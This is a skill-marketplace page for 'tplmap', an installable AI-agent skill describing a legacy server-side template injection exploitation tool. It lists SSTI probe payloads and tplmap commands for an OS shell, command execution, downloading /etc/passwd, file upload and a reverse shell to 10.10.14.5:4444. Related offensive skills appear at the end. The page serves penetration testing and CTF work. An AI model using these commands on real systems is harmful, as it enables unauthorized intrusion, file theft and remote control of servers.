aeondave/tplmap
offensive-tools/vuln-scanners/tplmap/SKILL.md
tplmap: classic server-side template injection and code injection detection/exploitation tool for black-box web testing. Use when an input parameter appears SSTI-prone and you want engine fingerprinting plus file read, command execution, upload/download, or shell primitives across Jinja2, Mako, Twig, Smarty, Freemarker, Velocity, Pug, Nunjucks, and similar engines.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill tplmapInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 20, 2026, 3:47 AM131.3s1 file scanned
SKILL.md
- name:
- tplmap
- description:
- tplmap: classic server-side template injection and code injection detection/exploitation tool for black-box web testing. Use when an input parameter appears SSTI-prone and you want engine fingerprinting plus file read, command execution, upload/download, or shell primitives across Jinja2, Mako, Twig, Smarty, Freemarker, Velocity, Pug, Nunjucks, and similar engines.
- license:
- GPL-3.0
- compatibility:
- Linux, macOS, WSL; Python environment from repo clone; legacy project with old dependency assumptions
- author:
- AeonDave
- version:
- 1.0
Tplmap
Legacy SSTI and code-injection exploitation tool.
Important status note
Upstream explicitly marks tplmap as no longer maintained. Keep it for:
- legacy labs
- older SSTI writeups and workflows
- historical engine coverage already implemented by tplmap
Prefer sstimap for actively maintained modern SSTI work, but keep tplmap available because many operators and challenge environments still reference it directly.
Quick Start
git clone https://github.com/epinna/tplmap
cd tplmap
pip install -r requirements.txt
# Probe a reflected parameter
./tplmap.py -u 'http://target/page?name=John'
What tplmap gives you
Once an injection point is confirmed, tplmap can expose capabilities such as:
- OS command execution
- pseudo-shell access
- file read and file write
- upload/download helpers
- reverse shell and bind shell helpers
Core Workflow
1. Start with a suspected SSTI point
Manual confirmation often looks like:
{{7*7}}${7*7}<%= 7*7 %>#{7*7}
If the server evaluates instead of reflecting raw input, hand the endpoint to tplmap.
2. Fingerprint the engine
./tplmap.py -u 'http://target/page?name=John'
Upstream shows tplmap identifying:
- vulnerable parameter
- engine
- injection syntax
- context
- OS
- available capabilities
3. Escalate
./tplmap.py --os-shell -u 'http://target/page?name=John'
./tplmap.py --os-cmd 'id' -u 'http://target/page?name=John'
./tplmap.py --download /etc/passwd passwd.txt -u 'http://target/page?name=John'
./tplmap.py --upload local.txt /tmp/remote.txt -u 'http://target/page?name=John'
./tplmap.py --reverse-shell 10.10.14.5 4444 -u 'http://target/page?name=John'
Supported Engine Coverage
Tplmap supports a broad historical set, including:
- Jinja2, Mako, Tornado
- Twig, Smarty
- Freemarker, Velocity
- Pug, Nunjucks, doT, Marko, EJS
- ERB, Slim
- generic eval-like code injection contexts
Upstream also documents important negative cases, such as modern Twig or secured Smarty scenarios where tplmap will not help.
Practical Notes
- Use tplmap after you already suspect SSTI, not as a replacement for manual probing.
- Keep manual payloads ready for confirmation and fallback when auto-detection misses context-specific quirks.
- Treat results from old writeups carefully; some engine escape chains have changed.
- If tplmap misses a modern target, switch to
sstimapor manual exploitation.
Caveats
- Unmaintained upstream.
- Legacy dependencies and assumptions may break on current Python environments.
- Modern engine versions may be unsupported even when the original family is listed.
Resources
No bundled scripts/, references/, or assets/.
Use upstream README for exact legacy options and engine-specific support notes.
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026